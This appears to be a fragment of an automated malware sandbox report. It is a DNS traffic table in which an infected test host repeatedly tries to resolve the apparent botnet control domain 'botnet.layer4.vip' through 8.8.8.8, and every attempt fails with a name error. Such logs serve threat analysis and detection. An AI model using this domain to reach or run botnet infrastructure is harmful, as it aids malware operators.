                                  Apr 9, 2023 03:31:38.993869066 CEST8.8.8.8192.168.2.230x54dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.034459114 CEST8.8.8.8192.168.2.230x54dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.106609106 CEST8.8.8.8192.168.2.230x9780Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.195691109 CEST8.8.8.8192.168.2.230xbcbfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.251737118 CEST8.8.8.8192.168.2.230xbcbfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.275960922 CEST8.8.8.8192.168.2.230xbcbfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.291785002 CEST8.8.8.8192.168.2.230x966dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.316528082 CEST8.8.8.8192.168.2.230x966dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.340827942 CEST8.8.8.8192.168.2.230x966dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.356496096 CEST8.8.8.8192.168.2.230x966dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.380947113 CEST8.8.8.8192.168.2.230x966dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.397046089 CEST8.8.8.8192.168.2.230x2f80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.436994076 CEST8.8.8.8192.168.2.230x2f80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.461332083 CEST8.8.8.8192.168.2.230x2f80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.485402107 CEST8.8.8.8192.168.2.230x2f80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.501085997 CEST8.8.8.8192.168.2.230xf789Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.516643047 CEST8.8.8.8192.168.2.230xf789Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.589356899 CEST8.8.8.8192.168.2.230xf789Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.614027023 CEST8.8.8.8192.168.2.230xc289Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.638326883 CEST8.8.8.8192.168.2.230xc289Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.775801897 CEST8.8.8.8192.168.2.230x686Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.791440964 CEST8.8.8.8192.168.2.230x686Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.807090044 CEST8.8.8.8192.168.2.230xa50fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.823569059 CEST8.8.8.8192.168.2.230xa50fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.839924097 CEST8.8.8.8192.168.2.230xa50fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.888776064 CEST8.8.8.8192.168.2.230xa50fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.908452988 CEST8.8.8.8192.168.2.230x96d0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.956917048 CEST8.8.8.8192.168.2.230x96d0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.973583937 CEST8.8.8.8192.168.2.230x96d0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.989012957 CEST8.8.8.8192.168.2.230x96d0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.022262096 CEST8.8.8.8192.168.2.230x6b14Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.047540903 CEST8.8.8.8192.168.2.230x6b14Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.087333918 CEST8.8.8.8192.168.2.230x6b14Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.111978054 CEST8.8.8.8192.168.2.230xaa22Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.161041975 CEST8.8.8.8192.168.2.230xaa22Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.210385084 CEST8.8.8.8192.168.2.230xaa22Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.234910965 CEST8.8.8.8192.168.2.230x76cbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.250608921 CEST8.8.8.8192.168.2.230x76cbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.274677992 CEST8.8.8.8192.168.2.230x76cbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.347999096 CEST8.8.8.8192.168.2.230x7cb2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.413113117 CEST8.8.8.8192.168.2.230x7cb2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.478895903 CEST8.8.8.8192.168.2.230x3b31Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.511728048 CEST8.8.8.8192.168.2.230x3b31Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.536566019 CEST8.8.8.8192.168.2.230x3b31Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.560899973 CEST8.8.8.8192.168.2.230x180cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.586419106 CEST8.8.8.8192.168.2.230x180cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.658845901 CEST8.8.8.8192.168.2.230x6983Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.822875977 CEST8.8.8.8192.168.2.230xe55aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.886897087 CEST8.8.8.8192.168.2.230x7b7fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.968451977 CEST8.8.8.8192.168.2.230x7b7fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.008733034 CEST8.8.8.8192.168.2.230x6ffbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.048675060 CEST8.8.8.8192.168.2.230x6ffbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.081590891 CEST8.8.8.8192.168.2.230xed18Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.162405014 CEST8.8.8.8192.168.2.230xed18Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.258065939 CEST8.8.8.8192.168.2.230xd76bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.297960043 CEST8.8.8.8192.168.2.230x3a8fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.313476086 CEST8.8.8.8192.168.2.230x3a8fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.353316069 CEST8.8.8.8192.168.2.230x3a8fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.392941952 CEST8.8.8.8192.168.2.230x3df2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.417399883 CEST8.8.8.8192.168.2.230x3df2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.457844973 CEST8.8.8.8192.168.2.230x3df2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.482358932 CEST8.8.8.8192.168.2.230x5620Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.530941963 CEST8.8.8.8192.168.2.230x5620Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.643585920 CEST8.8.8.8192.168.2.230x5f10Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.683993101 CEST8.8.8.8192.168.2.230xc20dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.708184958 CEST8.8.8.8192.168.2.230xc20dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.725191116 CEST8.8.8.8192.168.2.230xc20dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.839720011 CEST8.8.8.8192.168.2.230x2b33Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.863831043 CEST8.8.8.8192.168.2.230x2b33Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.953134060 CEST8.8.8.8192.168.2.230xe7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.968749046 CEST8.8.8.8192.168.2.230xe7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.993443012 CEST8.8.8.8192.168.2.230xe7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.009512901 CEST8.8.8.8192.168.2.230x53e6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.123380899 CEST8.8.8.8192.168.2.230xa5efName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.259977102 CEST8.8.8.8192.168.2.230xce72Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.284368992 CEST8.8.8.8192.168.2.230xce72Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.333272934 CEST8.8.8.8192.168.2.230xce72Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.349184990 CEST8.8.8.8192.168.2.230xb3e6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.364662886 CEST8.8.8.8192.168.2.230xb3e6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.396136045 CEST8.8.8.8192.168.2.230xb3e6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.580378056 CEST8.8.8.8192.168.2.230xbb4aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.604522943 CEST8.8.8.8192.168.2.230xbb4aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.629370928 CEST8.8.8.8192.168.2.230xbb4aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.678010941 CEST8.8.8.8192.168.2.230xc067Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.734836102 CEST8.8.8.8192.168.2.230xc067Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.759429932 CEST8.8.8.8192.168.2.230xc067Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.775526047 CEST8.8.8.8192.168.2.230xb76cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.888304949 CEST8.8.8.8192.168.2.230x210fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.912936926 CEST8.8.8.8192.168.2.230x210fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.988226891 CEST8.8.8.8192.168.2.230x210fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.012479067 CEST8.8.8.8192.168.2.230xc806Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.036931992 CEST8.8.8.8192.168.2.230xc806Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.060965061 CEST8.8.8.8192.168.2.230xc806Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.076524019 CEST8.8.8.8192.168.2.230xc806Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.116242886 CEST8.8.8.8192.168.2.230xf01eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.156040907 CEST8.8.8.8192.168.2.230xf01eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.196010113 CEST8.8.8.8192.168.2.230xf01eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.220525026 CEST8.8.8.8192.168.2.230xb3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.251621008 CEST8.8.8.8192.168.2.230xb3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.324532986 CEST8.8.8.8192.168.2.230x75f1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.340059996 CEST8.8.8.8192.168.2.230x75f1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.355648994 CEST8.8.8.8192.168.2.230x75f1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.379784107 CEST8.8.8.8192.168.2.230x75f1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.395612001 CEST8.8.8.8192.168.2.230x75f1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.420013905 CEST8.8.8.8192.168.2.230xf181Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.444125891 CEST8.8.8.8192.168.2.230xf181Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.499608040 CEST8.8.8.8192.168.2.230xf181Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.546788931 CEST8.8.8.8192.168.2.230x45dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.586766958 CEST8.8.8.8192.168.2.230x45dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.610857010 CEST8.8.8.8192.168.2.230x6a45Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.774039030 CEST8.8.8.8192.168.2.230x3d1aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.805082083 CEST8.8.8.8192.168.2.230x9afbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.829267979 CEST8.8.8.8192.168.2.230x9afbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.845276117 CEST8.8.8.8192.168.2.230x9afbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.869468927 CEST8.8.8.8192.168.2.230x9afbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.885072947 CEST8.8.8.8192.168.2.230x9afbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.949973106 CEST8.8.8.8192.168.2.230x945fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.965893030 CEST8.8.8.8192.168.2.230x945fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.990268946 CEST8.8.8.8192.168.2.230x945fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.039438963 CEST8.8.8.8192.168.2.230xbfc9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.079289913 CEST8.8.8.8192.168.2.230xbfc9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.095138073 CEST8.8.8.8192.168.2.230xbfc9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.151493073 CEST8.8.8.8192.168.2.230x4b3eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.175698042 CEST8.8.8.8192.168.2.230x4b3eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.191759109 CEST8.8.8.8192.168.2.230x4b3eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.321271896 CEST8.8.8.8192.168.2.230x59beName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.337274075 CEST8.8.8.8192.168.2.230x59beName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.361447096 CEST8.8.8.8192.168.2.230x59beName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.392812014 CEST8.8.8.8192.168.2.230x59beName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.472876072 CEST8.8.8.8192.168.2.230xd4c3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.567553043 CEST8.8.8.8192.168.2.230x4e28Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.591960907 CEST8.8.8.8192.168.2.230xf19cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.607564926 CEST8.8.8.8192.168.2.230xf19cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.712130070 CEST8.8.8.8192.168.2.230x97b9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.728050947 CEST8.8.8.8192.168.2.230x97b9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.767987967 CEST8.8.8.8192.168.2.230x97b9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.792135954 CEST8.8.8.8192.168.2.230xb6b3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.880162954 CEST8.8.8.8192.168.2.230xb6b3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.895735979 CEST8.8.8.8192.168.2.230x38e6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.911583900 CEST8.8.8.8192.168.2.230x38e6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.958440065 CEST8.8.8.8192.168.2.230x38e6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.982984066 CEST8.8.8.8192.168.2.230xa635Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.007281065 CEST8.8.8.8192.168.2.230xa635Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.023231030 CEST8.8.8.8192.168.2.230xa635Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.079996109 CEST8.8.8.8192.168.2.230x3fb8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.144773960 CEST8.8.8.8192.168.2.230x3fb8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.168937922 CEST8.8.8.8192.168.2.230x3fb8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.249603033 CEST8.8.8.8192.168.2.230xdacfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.290313959 CEST8.8.8.8192.168.2.230x648aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.305907011 CEST8.8.8.8192.168.2.230x648aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.370656967 CEST8.8.8.8192.168.2.230x648aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.402601957 CEST8.8.8.8192.168.2.230xd9c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.420377970 CEST8.8.8.8192.168.2.230xd9c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.444881916 CEST8.8.8.8192.168.2.230xd9c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.469194889 CEST8.8.8.8192.168.2.230xd9c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.493649006 CEST8.8.8.8192.168.2.230xce4bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.509313107 CEST8.8.8.8192.168.2.230xce4bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.533754110 CEST8.8.8.8192.168.2.230xce4bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.558238983 CEST8.8.8.8192.168.2.230xce4bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.598381042 CEST8.8.8.8192.168.2.230x6ccName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.613909960 CEST8.8.8.8192.168.2.230x6ccName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.702045918 CEST8.8.8.8192.168.2.230xd569Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.732095957 CEST8.8.8.8192.168.2.230xd569Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.747965097 CEST8.8.8.8192.168.2.230xd569Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.772433043 CEST8.8.8.8192.168.2.230xd569Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.788286924 CEST8.8.8.8192.168.2.230xd569Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.844048977 CEST8.8.8.8192.168.2.230x14a6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.875927925 CEST8.8.8.8192.168.2.230x14a6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.964704990 CEST8.8.8.8192.168.2.230x4225Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.005981922 CEST8.8.8.8192.168.2.230xae18Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.069400072 CEST8.8.8.8192.168.2.230xae18Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.101799011 CEST8.8.8.8192.168.2.230xd753Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.151700020 CEST8.8.8.8192.168.2.230xd753Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.191698074 CEST8.8.8.8192.168.2.230xf48eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.246885061 CEST8.8.8.8192.168.2.230xf48eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.286530018 CEST8.8.8.8192.168.2.230xf3d2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.399291992 CEST8.8.8.8192.168.2.230xe118Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.423346043 CEST8.8.8.8192.168.2.230xe118Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.526043892 CEST8.8.8.8192.168.2.230x510Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.566068888 CEST8.8.8.8192.168.2.230x510Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.637387037 CEST8.8.8.8192.168.2.230x3c2bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.652812004 CEST8.8.8.8192.168.2.230x3c2bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.723511934 CEST8.8.8.8192.168.2.230x1650Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.755172014 CEST8.8.8.8192.168.2.230x1650Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.802440882 CEST8.8.8.8192.168.2.230xa7c4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.833760023 CEST8.8.8.8192.168.2.230xa7c4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
